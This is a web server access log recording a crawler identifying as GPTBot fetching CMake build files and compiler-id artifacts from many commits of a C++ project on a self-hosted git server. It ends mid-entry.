"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23183] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12465] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13531] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19986] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10766] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23185] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11594] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11614] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11586] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11614] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr 